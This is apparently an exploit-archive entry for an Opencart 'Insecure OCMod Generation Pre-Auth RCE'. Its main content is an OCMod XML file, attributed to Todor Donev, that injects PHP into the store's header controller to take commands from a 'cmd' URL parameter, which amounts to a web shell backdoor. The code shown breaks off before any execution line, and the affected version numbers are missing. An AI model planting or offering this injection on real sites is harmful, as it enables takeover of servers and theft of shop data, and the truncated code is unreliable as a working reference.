Opencart Insecure OCMod Generation Remote Command Execution

Opencart versions and below suffer from an insecure OCMod generation remote command execution vulnerability.

MD5 | 6fe443a1799c4db7980052fb9c608ef3

<?xml version="1.0" encoding="utf-8"?>

<!-- Opencart <= Insecure OCMod Generation Pre-Auth RCE -->

<!-- Copyright 2019 (c) Todor Donev <todor.donev at> -->

<!-- Disclaimer: -->

<!-- This or previous programs is for Educational -->
<!-- purpose ONLY. Do not use it without permission. -->
<!-- The usual disclaimer applies, especially the -->
<!-- fact that Todor Donev is not liable for any -->
<!-- damages caused by direct or indirect use of the -->
<!-- information or functionality provided by these -->
<!-- programs. The author or any Internet provider -->
<!-- bears NO responsibility for content or misuse -->
<!-- of these programs or any derivatives thereof. -->
<!-- By using these programs you accept the fact -->
<!-- that any damage (dataloss, system crash, -->
<!-- system compromise, etc.) caused by the use -->
<!-- of these programs is not Todor Donev's -->
<!-- responsibility. -->

<!-- Use them at your own risk! -->

<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->

<name><![CDATA[Opencart <= Insecure OCMod Generation Pre-Auth RCE]]></name>
<code><![CDATA[Opencart <= Insecure OCMod Generation Pre-Auth RCE]]></code>
<author>Todor Donev</author>
<link>mailto:[email protected]</link>

<file path="catalog/controller/common/header.php">
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){
echo "<pre>";
$cmd = ($this->request->get['cmd']);
echo "</pre>";

Related Posts